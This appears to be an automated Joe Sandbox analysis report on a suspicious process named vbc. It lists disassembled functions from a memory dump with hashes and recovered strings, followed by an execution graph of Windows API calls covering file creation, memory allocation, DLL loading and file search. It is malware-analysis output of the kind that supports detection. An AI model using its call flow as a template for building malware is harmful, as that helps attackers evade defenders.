                                                                                    Function 058C3D10 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 65c63e565e975b3984c565cc54ecd5e5ec9549b27ce8207656a5b7470801035b
                                                                                    • Instruction ID: 95f6c9a8a549eca58271ae1e5c3fd449f1c35297952be0ec60b8e831e78e60a8
                                                                                    • Opcode Fuzzy Hash: 65c63e565e975b3984c565cc54ecd5e5ec9549b27ce8207656a5b7470801035b
                                                                                    • Instruction Fuzzy Hash: B890023630241146954072585844A4E826587E1302BD5D415A5019554CC9188D655632
                                                                                    Function 058C3D70 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 676a077adac283846c7b38997eb4e99502a5790418cab8ef55aa26f4dbeda841
                                                                                    • Instruction ID: 56dcda3b9b0a9ce0799960809bf6b704669959123cc543715149e4b4812da1c0
                                                                                    • Opcode Fuzzy Hash: 676a077adac283846c7b38997eb4e99502a5790418cab8ef55aa26f4dbeda841
                                                                                    • Instruction Fuzzy Hash: BB90023A30141406D5107158584464641A687D0301F95D411A5428558D86588DA5A532
                                                                                    Function 058C39B0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dbdb2dc2da760e970e177c47cb56c06b06846ebec01da1790c88fa009f44760b
                                                                                    • Instruction ID: 6170115a24d55ef439fd8632e6d62cf4b830c8aa07fa09f2168057886920c0c2
                                                                                    • Opcode Fuzzy Hash: dbdb2dc2da760e970e177c47cb56c06b06846ebec01da1790c88fa009f44760b
                                                                                    • Instruction Fuzzy Hash: D190022634546106D150715C44446168165A7E0201F95C021A5818594D85598D596632
                                                                                    Function 058C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction ID: 3c3ebd2abaf183f79674e8668d8e15843a04af5e87211478a4b469b3f7b2c1fe
                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Function 058C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: de306fb11a66c93039e95bdac05ecd4beeb90f685b41f5743ad9929f96a4280b
                                                                                    • Instruction ID: b8b8133937d35484b50f03cb6e4c44b4e43a17056b0d5d4cf19e3c576f0a7098
                                                                                    • Opcode Fuzzy Hash: de306fb11a66c93039e95bdac05ecd4beeb90f685b41f5743ad9929f96a4280b
                                                                                    • Instruction Fuzzy Hash: 6151EBB5A0411ABFCB14DB9C889497EFBF9FB0C200B54816DECDAD7681E634DE0487A0
                                                                                    Function 05932410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: a9daa4a7edabeae7745a6f4db823689bfa614ce018c17aab8f7c1b62669442bf
                                                                                    • Instruction ID: c55d612f327b2494068afe5cc4e8d28de20195dc932ad5a7db7861842307f4a9
                                                                                    • Opcode Fuzzy Hash: a9daa4a7edabeae7745a6f4db823689bfa614ce018c17aab8f7c1b62669442bf
                                                                                    • Instruction Fuzzy Hash: 41510379B04645EECF30DF9CC89597FB7FEEB48200B448869E896D7641EA74EE008761
                                                                                    Function 058B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 058F46FC
                                                                                    • Execute=1, xrefs: 058F4713
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 058F4742
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 058F4655
                                                                                    • ExecuteOptions, xrefs: 058F46A0
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 058F4725
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 058F4787
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: a5b16745831a13250ddea4139bf42c83e2b9f5ab22de27637ce4ef3946721bec
                                                                                    • Instruction ID: 8de5f2b2e89815e4d8e201249c3e70742734e39bdc983c9f3e63af8b85725f5d
                                                                                    • Opcode Fuzzy Hash: a5b16745831a13250ddea4139bf42c83e2b9f5ab22de27637ce4ef3946721bec
                                                                                    • Instruction Fuzzy Hash: 9051E73160431D6AEF10EA68DC99FFA77ADFB49304F040099ED05E7291EBB09E45CB55
                                                                                    Function 058CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction ID: e6f8a4cfd6d4e893356fe3e41cd4c2b82b304ca20aa30439299803e5fd04c29d
                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction Fuzzy Hash: 84816D70A49A499BDF24CE68C853BBEBFA2BF45352F98419DDC92E7290C734DC408B51
                                                                                    Function 059320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$[$]:%u
                                                                                    • API String ID: 48624451-2819853543
                                                                                    • Opcode ID: 432b65519e1ea0420fce93c845319ef2219ea8bb17fb5981fc848bf9cc7da221
                                                                                    • Instruction ID: a037f168af862ed030bfff1c124818f1280c2ebaa4b039d182677948ab05a651
                                                                                    • Opcode Fuzzy Hash: 432b65519e1ea0420fce93c845319ef2219ea8bb17fb5981fc848bf9cc7da221
                                                                                    • Instruction Fuzzy Hash: 7521537AA00219EBCB10DFA9CE45AFEBBFDEF44644F040166ED45D3200EB30D9019BA1
                                                                                    Function 058AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 058F031E
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 058F02BD
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 058F02E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    • Opcode ID: 3f5f84fc264807b6126f0fd7e440de0c8aaa0fce98699b8d215fae9f9b97338c
                                                                                    • Instruction ID: b322f39fcb23e464dbb4a3cedfe95021225df058b65b81e5adaad892ea21337e
                                                                                    • Opcode Fuzzy Hash: 3f5f84fc264807b6126f0fd7e440de0c8aaa0fce98699b8d215fae9f9b97338c
                                                                                    • Instruction Fuzzy Hash: 5FE19D35608745DFE725CF28C888B2AB7E1BB88314F140A59EAA6CB2D1D774ED44CB52
                                                                                    Function 058BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 058F7BAC
                                                                                    • RTL: Resource at %p, xrefs: 058F7B8E
                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 058F7B7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 0-871070163
                                                                                    • Opcode ID: 45b1070f30166bc987b065886515aa291dba8cf475965273fb6dd8d0f46332fb
                                                                                    • Instruction ID: 1a8e9b0f80d436739cf9dcc25ee3a47e7db1cc29561ae338e43b47dd248b5fce
                                                                                    • Opcode Fuzzy Hash: 45b1070f30166bc987b065886515aa291dba8cf475965273fb6dd8d0f46332fb
                                                                                    • Instruction Fuzzy Hash: 214190317047069FE720DE298840B6AB7EAEB89711F100A1DED9AD7780DB71E905CB91
                                                                                    Function 058BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 058F728C
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 058F72C1
                                                                                    • RTL: Resource at %p, xrefs: 058F72A3
                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 058F7294
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 885266447-605551621
                                                                                    • Opcode ID: 69f3288af026b31257bed2286e4041e1c809c9460ff751fb7b0ae5b90a44f3ee
                                                                                    • Instruction ID: aa99eb68d245e4a3ade4dca369a9ddfa8b295d8daedcf2bcc4a2be51b9dc1640
                                                                                    • Opcode Fuzzy Hash: 69f3288af026b31257bed2286e4041e1c809c9460ff751fb7b0ae5b90a44f3ee
                                                                                    • Instruction Fuzzy Hash: 2A41AC31704206ABE721DE25CC41FAAB7E6FB88715F100619ED56EB380DB71EC52CB92
                                                                                    Function 05932300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$]:%u
                                                                                    • API String ID: 48624451-3050659472
                                                                                    • Opcode ID: 4f1f1fddbffb9d53358a2e53dda37e3584fd3c6ec7ecbcd76a549a72d2de86a1
                                                                                    • Instruction ID: 1c729d2a9f2b4917b71eb7a5327c6c3ff54f5c9d147e35649ab5946a5b89f108
                                                                                    • Opcode Fuzzy Hash: 4f1f1fddbffb9d53358a2e53dda37e3584fd3c6ec7ecbcd76a549a72d2de86a1
                                                                                    • Instruction Fuzzy Hash: 75314176A00219DFCB20DF29DC45BEEB7F9FB44650F44455AE849E7240EB30EA449BA1
                                                                                    Function 058C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction ID: e9491f2c6b8e202d4cf83bbe625c599dc4217d1d2f9e5faccd44b52b0f84549d
                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction Fuzzy Hash: 7391AE71E1420A9ADB24DE69C881ABEBFA6FF45720F14459EEC65E72C0E730DD418F20
                                                                                    Function 05889126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280
                                                                                    • Opcode ID: a13cae819f4789500a9d182e33b667fb440b211340f02915b4e1f8a87da6addf
                                                                                    • Instruction ID: ec018552d137b5ccff5d8adadf4cf4045f39d5c9233c3e71e9c0e8672724541c
                                                                                    • Opcode Fuzzy Hash: a13cae819f4789500a9d182e33b667fb440b211340f02915b4e1f8a87da6addf
                                                                                    • Instruction Fuzzy Hash: 98812975D042699BDB25DB54CC44BEAB7B8BB09710F0441EAED1AF7240D7309E81CFA1

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.5%
                                                                                    Dynamic/Decrypted Code Coverage:4.3%
                                                                                    Signature Coverage:1.6%
                                                                                    Total number of Nodes:442
                                                                                    Total number of Limit Nodes:72
                                                                                    execution_graph 100454 2818b81 100455 2818b91 100454->100455 100456 2818b41 100455->100456 100458 2817410 100455->100458 100459 281745f 100458->100459 100460 2817426 100458->100460 100459->100456 100460->100459 100462 2817280 LdrLoadDll 100460->100462 100462->100459 100463 28294c0 100464 2829577 100463->100464 100466 28294ef 100463->100466 100465 282958d NtCreateFile 100464->100465 100467 28134c5 100468 2813474 100467->100468 100470 28134c8 100467->100470 100474 28180e0 100468->100474 100473 281349f 100475 28180fa 100474->100475 100479 2813483 100474->100479 100483 2828ea0 100475->100483 100478 28297d0 NtClose 100478->100479 100479->100473 100480 28297d0 100479->100480 100481 28297ed 100480->100481 100482 28297fe NtClose 100481->100482 100482->100473 100484 2828ebd 100483->100484 100487 47d35c0 LdrInitializeThunk 100484->100487 100485 28181ca 100485->100478 100487->100485 100488 281118b PostThreadMessageW 100489 281119d 100488->100489 100491 2809e10 100492 280a218 100491->100492 100493 280a790 100492->100493 100495 282b520 100492->100495 100496 282b546 100495->100496 100501 2804060 100496->100501 100498 282b552 100499 282b58b 100498->100499 100504 2825900 100498->100504 100499->100493 100508 2813580 100501->100508 100503 280406d 100503->100498 100505 2825962 100504->100505 100507 282596f 100505->100507 100532 2811d40 100505->100532 100507->100499 100509 2813597 100508->100509 100511 28135b0 100509->100511 100512 282a250 100509->100512 100511->100503 100514 282a26a 100512->100514 100513 282a299 100513->100511 100514->100513 100519 2828e00 100514->100519 100520 2828e1d 100519->100520 100526 47d2c0a 100520->100526 100521 2828e49 100523 282b8b0 100521->100523 100529 2829b60 100523->100529 100525 282a30c 100525->100511 100527 47d2c1f LdrInitializeThunk 100526->100527 100528 47d2c11 100526->100528 100527->100521 100528->100521 100530 2829b7d 100529->100530 100531 2829b8e RtlFreeHeap 100530->100531 100531->100525 100533 2811d7b 100532->100533 100548 28181f0 100533->100548 100535 2811d83 100547 2812066 100535->100547 100559 282b990 100535->100559 100537 2811d99 100538 282b990 RtlAllocateHeap 100537->100538 100539 2811daa 100538->100539 100540 282b990 RtlAllocateHeap 100539->100540 100541 2811dbb 100540->100541 100544 2811e52 100541->100544 100570 2816d80 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100541->100570 100562 28148c0 100544->100562 100545 2812012 100566 2828240 100545->100566 100547->100507 100549 281821c 100548->100549 100550 28180e0 2 API calls 100549->100550 100551 281823f 100550->100551 100552 2818261 100551->100552 100553 2818249 100551->100553 100555 281827d 100552->100555 100557 28297d0 NtClose 100552->100557 100554 2818254 100553->100554 100556 28297d0 NtClose 100553->100556 100554->100535 100555->100535 100556->100554 100558 2818273 100557->100558 100558->100535 100571 2829b10 100559->100571 100561 282b9ab 100561->100537 100563 28148e4 100562->100563 100564 2814920 LdrLoadDll 100563->100564 100565 28148eb 100563->100565 100564->100565 100565->100545 100567 28282a1 100566->100567 100569 28282ae 100567->100569 100574 2812080 100567->100574 100569->100547 100570->100544 100572 2829b2d 100571->100572 100573 2829b3e RtlAllocateHeap 100572->100573 100573->100561 100590 28184c0 100574->100590 100576 28125f3 100576->100569 100577 28120a0 100577->100576 100594 2821430 100577->100594 100580 28122b4 100602 282ca80 100580->100602 100582 28120fe 100582->100576 100597 282c950 100582->100597 100584 28122c9 100585 2812319 100584->100585 100608 2810bb0 100584->100608 100585->100576 100588 2810bb0 LdrInitializeThunk 100585->100588 100612 2818460 100585->100612 100587 2818460 LdrInitializeThunk 100589 2812467 100587->100589 100588->100585 100589->100585 100589->100587 100591 28184cd 100590->100591 100592 28184f5 100591->100592 100593 28184ee SetErrorMode 100591->100593 100592->100577 100593->100592 100596 2821451 100594->100596 100616 282b830 100594->100616 100596->100582 100598 282c960 100597->100598 100599 282c966 100597->100599 100598->100580 100600 282b990 RtlAllocateHeap 100599->100600 100601 282c98c 100600->100601 100601->100580 100603 282c9f0 100602->100603 100604 282b990 RtlAllocateHeap 100603->100604 100605 282ca4d 100603->100605 100606 282ca2a 100604->100606 100605->100584 100607 282b8b0 RtlFreeHeap 100606->100607 100607->100605 100609 2810bc3 100608->100609 100623 2829a70 100609->100623 100613 2818473 100612->100613 100628 2828d00 100613->100628 100615 281849e 100615->100585 100619 2829940 100616->100619 100618 282b85e 100618->100596 100620 28299d8 100619->100620 100622 282996e 100619->100622 100621 28299ee NtAllocateVirtualMemory 100620->100621 100621->100618 100622->100618 100624 2829a8a 100623->100624 100627 47d2c70 LdrInitializeThunk 100624->100627 100625 2810bcf 100625->100589 100627->100625 100629 2828d81 100628->100629 100631 2828d2e 100628->100631 100633 47d2dd0 LdrInitializeThunk 100629->100633 100630 2828da6 100630->100615 100631->100615 100633->100630 100634 2817490 100635 28174ac 100634->100635 100637 28174ff 100634->100637 100636 28297d0 NtClose 100635->100636 100635->100637 100639 28174c7 100636->100639 100638 2817637 100637->100638 100645 28168b0 NtClose LdrInitializeThunk LdrInitializeThunk 100637->100645 100644 28168b0 NtClose LdrInitializeThunk LdrInitializeThunk 100639->100644 100641 2817611 100641->100638 100646 2816a80 NtClose LdrInitializeThunk LdrInitializeThunk 100641->100646 100644->100637 100645->100641 100646->100638 100647 281b090 100652 281ada0 100647->100652 100649 281b09d 100666 281aa20 100649->100666 100651 281b0b9 100653 281adc5 100652->100653 100677 28186d0 100653->100677 100656 281af13 100656->100649 100658 281af2a 100658->100649 100659 281af21 100659->100658 100661 281b017 100659->100661 100696 281a470 100659->100696 100662 281b07a 100661->100662 100705 281a7e0 100661->100705 100664 282b8b0 RtlFreeHeap 100662->100664 100665 281b081 100664->100665 100665->100649 100667 281aa36 100666->100667 100670 281aa41 100666->100670 100668 282b990 RtlAllocateHeap 100667->100668 100668->100670 100669 281aa62 100669->100651 100670->100669 100671 28186d0 GetFileAttributesW 100670->100671 100672 281ad72 100670->100672 100675 281a470 RtlFreeHeap 100670->100675 100676 281a7e0 RtlFreeHeap 100670->100676 100671->100670 100673 281ad8b 100672->100673 100674 282b8b0 RtlFreeHeap 100672->100674 100673->100651 100674->100673 100675->100670 100676->100670 100678 28186f1 100677->100678 100679 28186f8 GetFileAttributesW 100678->100679 100680 2818703 100678->100680 100679->100680 100680->100656 100681 2823640 100680->100681 100682 282364e 100681->100682 100683 2823655 100681->100683 100682->100659 100684 28148c0 LdrLoadDll 100683->100684 100685 282368a 100684->100685 100686 2823699 100685->100686 100709 2823100 LdrLoadDll 100685->100709 100688 282b990 RtlAllocateHeap 100686->100688 100692 2823844 100686->100692 100689 28236b2 100688->100689 100690 282383a 100689->100690 100689->100692 100693 28236ce 100689->100693 100691 282b8b0 RtlFreeHeap 100690->100691 100690->100692 100691->100692 100692->100659 100693->100692 100694 282b8b0 RtlFreeHeap 100693->100694 100695 282382e 100694->100695 100695->100659 100697 281a496 100696->100697 100710 281dea0 100697->100710 100699 281a508 100701 281a526 100699->100701 100702 281a690 100699->100702 100700 281a675 100700->100659 100701->100700 100715 281a330 100701->100715 100702->100700 100703 281a330 RtlFreeHeap 100702->100703 100703->100702 100706 281a806 100705->100706 100707 281dea0 RtlFreeHeap 100706->100707 100708 281a88d 100707->100708 100708->100661 100709->100686 100712 281dec4 100710->100712 100711 281ded1 100711->100699 100712->100711 100713 282b8b0 RtlFreeHeap 100712->100713 100714 281df14 100713->100714 100714->100699 100716 281a34d 100715->100716 100719 281df30 100716->100719 100718 281a453 100718->100701 100720 281df54 100719->100720 100721 281dffe 100720->100721 100722 282b8b0 RtlFreeHeap 100720->100722 100721->100718 100722->100721 100723 2812610 100724 2812646 100723->100724 100725 2828e00 LdrInitializeThunk 100723->100725 100728 2829870 100724->100728 100725->100724 100727 281265b 100729 28298ff 100728->100729 100731 282989b 100728->100731 100733 47d2e80 LdrInitializeThunk 100729->100733 100730 2829930 100730->100727 100731->100727 100733->100730 100734 2815f10 100735 2815f40 100734->100735 100736 2818460 LdrInitializeThunk 100734->100736 100738 2815f6c 100735->100738 100739 28183e0 100735->100739 100736->100735 100740 2818424 100739->100740 100741 2818445 100740->100741 100746 2828ad0 100740->100746 100741->100735 100743 2818435 100744 2818451 100743->100744 100745 28297d0 NtClose 100743->100745 100744->100735 100745->100741 100747 2828b50 100746->100747 100749 2828afe 100746->100749 100751 47d4650 LdrInitializeThunk 100747->100751 100748 2828b75 100748->100743 100749->100743 100751->100748 100752 2825c90 100753 2825cf4 100752->100753 100754 2825d2b 100753->100754 100757 28214a0 100753->100757 100756 2825d0d 100758 2821446 100757->100758 100759 28214aa 100757->100759 100760 282b830 NtAllocateVirtualMemory 100758->100760 100761 2821451 100760->100761 100761->100756 100779 281c920 100781 281c949 100779->100781 100780 281ca4d 100781->100780 100782 281c9f3 FindFirstFileW 100781->100782 100782->100780 100784 281ca0e 100782->100784 100783 281ca34 FindNextFileW 100783->100784 100785 281ca46 FindClose 100783->100785 100784->100783 100785->100780 100786 281fb60 100787 281fbc4 100786->100787 100815 2816620 100787->100815 100789 281fcfe 100790 281fcf7 100790->100789 100822 2816730 100790->100822 100792 281fea3 100793 281feb2 100795 28297d0 NtClose 100793->100795 100794 281fd7a 100794->100792 100794->100793 100826 281f940 100794->100826 100798 281febc 100795->100798 100797 281fdb6 100797->100793 100799 281fdc1 100797->100799 100800 282b990 RtlAllocateHeap 100799->100800 100801 281fdea 100800->100801 100802 281fdf3 100801->100802 100803 281fe09 100801->100803 100804 28297d0 NtClose 100802->100804 100835 281f830 CoInitialize 100803->100835 100806 281fdfd 100804->100806 100807 281fe17 100838 2829290 100807->100838 100809 281fe92 100810 28297d0 NtClose 100809->100810 100811 281fe9c 100810->100811 100812 282b8b0 RtlFreeHeap 100811->100812 100812->100792 100813 281fe35 100813->100809 100814 2829290 LdrInitializeThunk 100813->100814 100814->100813 100816 2816653 100815->100816 100817 2816674 100816->100817 100842 2829330 100816->100842 100817->100790 100819 2816697 100819->100817 100820 28297d0 NtClose 100819->100820 100821 2816717 100820->100821 100821->100790 100823 2816755 100822->100823 100847 2829120 100823->100847 100827 281f95c 100826->100827 100828 28148c0 LdrLoadDll 100827->100828 100830 281f97a 100828->100830 100829 281f983 100829->100797 100830->100829 100831 28148c0 LdrLoadDll 100830->100831 100832 281fa4e 100831->100832 100833 28148c0 LdrLoadDll 100832->100833 100834 281faa8 100832->100834 100833->100834 100834->100797 100836 281f895 100835->100836 100837 281f92b CoUninitialize 100836->100837 100837->100807 100839 28292aa 100838->100839 100852 47d2ba0 LdrInitializeThunk 100839->100852 100840 28292da 100840->100813 100843 282934a 100842->100843 100846 47d2ca0 LdrInitializeThunk 100843->100846 100844 2829376 100844->100819 100846->100844 100848 282913a 100847->100848 100851 47d2c60 LdrInitializeThunk 100848->100851 100849 28167c9 100849->100794 100851->100849 100852->100840 100853 2820420 100854 282043d 100853->100854 100855 28148c0 LdrLoadDll 100854->100855 100856 282045b 100855->100856 100857 2821a60 100858 2821a7c 100857->100858 100859 2821aa4 100858->100859 100860 2821ab8 100858->100860 100861 28297d0 NtClose 100859->100861 100862 28297d0 NtClose 100860->100862 100863 2821aad 100861->100863 100864 2821ac1 100862->100864 100867 282b9d0 RtlAllocateHeap 100864->100867 100866 2821acc 100867->100866 100868 2829720 100869 282974e 100868->100869 100870 282979a 100868->100870 100871 28297b0 NtDeleteFile 100870->100871 100872 2812ae8 100873 2812b08 100872->100873 100874 2816620 2 API calls 100873->100874 100875 2812b13 100874->100875 100876 47d2ad0 LdrInitializeThunk 100877 2819f6f 100878 2819f7f 100877->100878 100879 282b8b0 RtlFreeHeap 100878->100879 100880 2819f86 100878->100880 100879->100880 100881 280b870 100882 280cee1 100881->100882 100883 282b830 NtAllocateVirtualMemory 100881->100883 100883->100882 100884 2809db0 100886 2809dbf 100884->100886 100885 2809e00 